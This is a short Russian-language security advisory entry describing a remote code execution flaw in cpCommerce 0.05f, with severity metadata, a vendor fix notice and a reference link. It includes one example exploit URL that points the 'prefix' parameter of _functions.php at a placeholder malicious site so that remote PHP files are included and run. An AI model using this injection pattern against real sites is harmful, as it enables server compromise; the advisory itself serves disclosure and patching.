Удаленное выполнение произвольного кода в cpCommerce

Дата публикации:	21.10.2003
Дата изменения:	21.10.2008
Всего просмотров:	1723
Опасность:	Высокая
Наличие исправления:	Да
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:	Удаленная
Воздействие:	Компрометация системы
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:	cpCommerce 0.x
	Уязвимые версии: cpCommerce 0.05f Описание: Уязвимость обнаружена в cpCommerce. Удаленный пользователь может скомпрометировать удаленную систему. Пример/Эксплоит: http://[victim]/[path_of_cpcommerce]/_functions.php?prefix=http://[malicious_site]/index, где http://[malicious_site]/index_config.php и "http://[malicious_site]/index_gateways.php URL производителя:http://cpcommerce.org/ Решение: Установите исправление с сайта производителя.
Ссылки:	http://www.zone-h.org/en/advisories/read/id=3284/

Подпишитесь на email рассылку